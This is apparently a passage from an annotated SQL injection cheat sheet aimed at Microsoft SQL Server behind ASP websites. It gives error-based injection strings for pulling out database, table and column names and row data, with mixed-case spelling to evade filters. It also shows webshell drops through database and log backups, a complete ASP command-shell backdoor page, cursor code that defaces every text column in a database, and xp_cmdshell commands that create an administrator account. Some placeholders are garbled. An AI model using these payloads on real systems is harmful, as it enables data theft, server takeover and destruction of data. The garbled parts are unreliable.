;and (select @@version)>0 -- SQL Server and Windows version
;and user_name()='dbo' -- is the current user dbo (i.e. sa-level)?
;and (select user_name())>0 -- current user name
;and (select db_name())>0 -- current database name
16. Webshell via backup (same as 14 with a different target path; the shell body is empty here too):
-- Same BACKUP DATABASE webshell as in 14, written under the web directory g:\wwwtest.
-- The inserted literal is EMPTY in this copy (shell body lost); the resulting file also
-- contains backup-format bytes around whatever is inserted.
use model
create table cmd(str image);
insert into cmd(str) values ('');
backup database model to disk='g:\wwwtest\l.asp';
(3)
Many servers have WScript.Shell disabled, or the account the commands run under lacks the needed rights, so the usual workaround is to upload your own cmd.exe and point the shell at it.
The page below instead instantiates the shell component by CLSID (two candidates; the second is only tried if the first fails) and runs `cmd.exe /c` with the submitted command.
That approach worked where the others did not, so it is given here in full.
Copy the following:
<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
<%if err then%>
<object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>
<%
' The second <object> above is only emitted when the first one left Err set — presumably two
' alternative CLSIDs of the shell COM component (the .exec/.stdout API used below is the
' WScript.Shell one); confirm both CLSIDs before relying on the fallback.
end if
' Minimal web command shell: the "c" form field is handed to cmd.exe and stdout is echoed
' into a textarea. Nothing is filtered or authenticated — this is a backdoor page by design.
response.write("<textarea readonly cols=80 rows=20>")
' Keep rendering the form even when exec() fails (object missing, no rights).
On Error Resume Next
' NOTE(review): there is no space between "/c" and the command, so this relies on cmd.exe
' accepting "/cCOMMAND" — verify, or insert a space.
response.write oScriptlhn.exec("cmd.exe /c" & request("c")).stdout.readall
response.write("</textarea>")
response.write("<form method='post'>")
response.write("<input type=text name='c' size=60><br>")
' The submit caption below is mojibake in this copy; left untouched because it is runtime output.
response.write("<input type=submit value='ִ'></form>")
%>
Save this as an .asp file, upload it into the web directory and open it in the browser.
It may still fail; the usual reason is the same one behind uploading your own cmd.exe first — the default cmd.exe may be inaccessible, so upload one and use its full path in the command.
If that also fails, inspect the directory permissions with cacls.
Second, some commands simply may not run in that context.
(4)
Get the database name (db_name(n) walks the database list by index; __i__ is the index placeholder):
and db_name()=0
and db_name(0)=0
and db_name(__i__)=0
and quotename(db_name(__i__))=0
Get the user name:
and user=0
Get the version:
and @@version=0
Get the server name:
and @@servername=0
Get the service (instance) name:
and @@servicename=0
Get the system (login) user:
and system_user=0
Get all of the above in one request, '|'-separated (mixed case only to dodge naive keyword filters):
AnD (dB_NaMe(0)+cHaR(124)+uSeR+cHaR(124)+@@vErSiOn+cHaR(124)+@@sErVeRnAmE+cHaR(124)+@@sErViCeNaMe+cHaR(124)+sYsTeM_UsEr)=0
Probe all role memberships in one request; the hex literals are UTF-16LE role names — sysadmin, dbcreator, bulkadmin, diskadmin, serveradmin, public, db_owner, db_backupoperator, db_datawriter — and the results come back '^'-separated:
AnD (cAsT(iS_srvrOlEmEmBeR(0x730079007300610064006d0069006e00)aS vArChAr)+cHaR(94)+cAsT(iS_srvrOlEmEmBeR(0x64006200630072006500610074006f007200)aS vArChAr)+cHaR(94)+cAsT(iS_srvrOlEmEmBeR(0x620075006c006b00610064006d0069006e00)aS vArChAr)+cHaR(94)+cAsT(iS_srvrOlEmEmBeR(0x6400690073006b00610064006d0069006e00)aS vArChAr)+cHaR(94)+cAsT(iS_srvrOlEmEmBeR(0x730065007200760065007200610064006d0069006e00)aS vArChAr)+cHaR(94)+cAsT(iS_mEmBeR (0x7000750062006c0069006300) aS vArChAr)+cHaR(94)+cAsT(iS_mEmBeR (0x640062005f006f0077006e0065007200) aS vArChAr)+cHaR(94)+cAsT(iS_mEmBeR (0x640062005f006200610063006b00750070006f00700065007200610074006f007200) aS vArChAr)+cHaR(94)+cAsT(iS_mEmBeR (0x640062005f006400610074006100770072006900740065007200) aS vArChAr))=0
Get the number of databases:
AnD (sElEcT cAsT(cOuNt(1) aS nvArChAr(100))+cHaR(9) FrOm mAsTeR..sYsDaTaBaSeS)=0
Get the database file names (the __i__ placeholder selects the i-th row):
and (select top 1 filename from (select top __i__ filename from master..sysdatabases order by filename) t order by filename desc)=0
Get database name and file name together:
AnD (sElEcT ToP 1 rtrim(iSnUlL(cAsT(nAmE aS nvArChAr(4000)),cHaR(32)))+cHaR(9)+rtrim(iSnUlL(cAsT(filenAmE aS nvArChAr(4000)),cHaR(32)))+cHaR(9) FrOm (sElEcT ToP __i__ nAmE,filenAmE FrOm mAsTeR..sYsDaTaBaSeS oRdEr bY nAmE) t oRdEr bY nAmE dEsC)=0
Get the number of user tables in a database (xtype 0x75 = 'U'); <db> is the database name:
and (select cast(count(1) as varchar)+char(9) from <ݿ>..sysobjects where xtype=0x75)=0
Get table names (xtype char(85) = 'U'); the second form pages with a `not in` list instead of nested TOPs:
and (select top 1 name from (select top __i__ name from <ݿ>..sysobjects where xtype=0X75 order by name) t order by name desc)=0
and (select top 1 quotename(name) from <ݿ>.dbo.sysobjects where xtype=char(85) AND name not in (select top __i__ name from <ݿ>.dbo.sysobjects where xtype=char(85)))=0
Get the number of columns of a table; <table> is the table name:
and (select cast(count(1) as varchar)+char(9) from <ݿ>..syscolumns where id=object_id('<>'))=0
Get column names (the col_name() form needs no subquery):
and (select top 1 name from (select top __i__ name,id from <ݿ>..syscolumns where id=object_id('<>') order by name) t order by name desc)=0
and (select col_name(object_id('<>'),__i__))=0
Get the row count of a table:
AnD (sElEcT cAsT(cOuNt(1) aS nvArChAr(100))+cHaR(9) FrOm <ݿ>..<>)=0
Get data, three columns at a time, tab-separated:
AnD (sElEcT ToP 1 rtrim(iSnUlL(cAsT(<1> aS nvArChAr(4000)),cHaR(32)))+cHaR(9)+rtrim(iSnUlL(cAsT(<2> aS nvArChAr(4000)),cHaR(32)))+cHaR(9)+rtrim(iSnUlL(cAsT(<3> aS nvArChAr(4000)),cHaR(32)))+cHaR(9) FrOm (sElEcT ToP __i__ <1>,<2>,<3> FrOm <ݿ>..<> oRdEr bY <>) t oRdEr bY <> dEsC)=0
Webshell via BACKUP LOG (the hex literal in step 2 decodes to `%><%eval(request(chr(97))):response.end%>`, a one-line ASP shell reading parameter "a"):
--1. Initialise: switch the database to FULL recovery so log backups are possible, create the
--   scratch table and take a first log backup to a temp file (placeholder <temp file>).
--   NOTE: this line hard-codes TestDB while step 3 uses a <database> placeholder; and
--   "Drop Table ttt" errors if ttt does not exist yet.
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<ʱļ:e:\wwwroot\m.asp>' With Init--
--2. Insert the shell body; the hex decodes to %><%eval(request(chr(97))):response.end%>
--   (an ASP one-liner that evaluates request parameter "a").
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
--3. Back up the log to the target file (the inserted row is now in the log), then drop the
--   scratch table and switch recovery back to SIMPLE.
;Backup Log <ݿ> To Disk = '<Ҫɵļ:e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
Webshell via differential database backup (the hex literal in the examples is the file path c:\asdf.asp):
1. Take a full backup first (recreating the scratch table ttt):
;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<ʱļ:0x633A5C617364662E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
2. Insert the shell body into ttt:
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
3. Differential backup to the target file (WITH FORMAT), then drop the scratch table:
;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<Ҫݳļ:0x633A5C617364662E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
Deface a specific row: append a <script> tag to one column of the rows matched by the WHERE clause:
;update <ݿ>..<> set <ֶ>=<ֶ>+'<script>alert("©")</script>' where <Ҫ>--
Mass defacement: a cursor over every user table (xtype 'u') and every ntext/text/nvarchar/varchar column (xtype 99/35/231/167) appends the payload to EVERY row — there is no WHERE, so this rewrites the whole database and is destructive. The second variant contains a stray space in `s yscolumns` and will not parse as written:
;dEcLaRe @t vArChAr(255),@c vArChAr(255) dEcLaRe tAbLe_cursoR cUrSoR FoR sElEcT a.nAmE,b.nAmE FrOm sYsObJeCtS a,sYsCoLuMnS b wHeRe a.iD=b.iD AnD a.xTyPe='u' AnD (b.xTyPe=99 oR b.xTyPe=35 oR b.xTyPe=231 oR b.xTyPe=167) oPeN tAbLe_cursoR fEtCh next FrOm tAbLe_cursoR iNtO @t,@c while(@@fEtCh_status=0) bEgIn exec('UpDaTe ['+@t+'] sEt ['+@c+']=rtrim(convert(varchar,['+@c+']))+cAsT(<Ҫ(0xʽ)> aS vArChAr(200<˴ӦӦ>))') fEtCh next FrOm tAbLe_cursoR iNtO @t,@c eNd cLoSe tAbLe_cursoR dEAlLoCaTe tAbLe_cursoR;--
;DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,s yscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<Ҫ>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor--
Run an OS command (adds a local administrator):
;exec master..xp_cmdshell 'net user name password /add & net localgroup administrators name /add'--
Restore the xp_cmdshell extended stored procedure (the hex literals are 'xp_cmdshell' as UTF-16LE and 'xplog70.dll'; needs sysadmin rights and the DLL on the server):
;Exec Master..sp_dropextendedproc 0x780070005F0063006D0064007300680065006C006C00;Exec Master..sp_addextendedproc 0x780070005F0063006D0064007300680065006C006C00,0x78706C6F6737302E646C6C--
SQL Server 2005+: enable xp_cmdshell (disabled by default; running sp_configure requires sysadmin-level rights):
;EXEC master..sp_configure 'show advanced options',1;RECONFIGURE;EXEC master..sp_configure 'xp_cmdshell',1;RECONFIGURE;
Disable xp_cmdshell again:
;EXEC master..sp_configure 'show advanced options',1;RECONFIGURE;EXEC master..sp_configure 'xp_cmdshell',0;RECONFIGURE;
SQL Server 2005+: enable OPENDATASOURCE/OPENROWSET ('Ad Hoc Distributed Queries', disabled by default):
;EXEC master..sp_configure 'show advanced options',1;RECONFIGURE;EXEC master..sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;
Disable again:
;EXEC master..sp_configure 'show advanced options',1;RECONFIGURE;EXEC master..sp_configure 'Ad Hoc Distributed Queries',0;RECONFIGURE;
SQL Server 2005 webshell via BACKUP LOG (the hex 0x640062006200610063006B00 is the nvarchar file name 'dbback'; the scratch-table name and the ALTER DATABASE target were lost from the placeholders in this copy — compare the ttt version above):
-- SQL Server 2005 variant of the BACKUP LOG webshell. __dbname__ is the target database; the
-- scratch-table name was lost from this copy (the empty "drop table" / "create table ( image)" /
-- "insert into ()" below) — compare the ttt version further up. The hex
-- 0x640062006200610063006B00 is the nvarchar file name 'dbback'.
-- 1. Switch to FULL recovery (the database name is missing on this line) and take a full
--    backup so that the log backups that follow are permitted.
alter database set recovery full
declare @d nvarchar(4000) set @d=0x640062006200610063006B00 backup database __dbname__ to disk=@d with init--
-- 2. Create the scratch image-column table and take a first log backup to the dummy file
--    (presumably so the next log backup carries little besides the inserted row).
drop table --
create table ( image)--
declare @d nvarchar(4000) set @d=0x640062006200610063006B00 backup log __dbname__ to disk=@d with init--
-- 3. Insert the shell body, then back up the log to the target file path: the inserted row
--    lands inside that file.
insert into () values(__varchar(ľ))--
declare @d nvarchar(4000) set @d=__nvarchar(ļ) backup log __dbname__ to disk=@d with init--
-- 4. Clean up: drop the scratch table and take one more log backup to the dummy file.
drop table declare @d nvarchar(4000) set @d=0x640062006200610063006B00 backup log __dbname__ to disk=@d with init--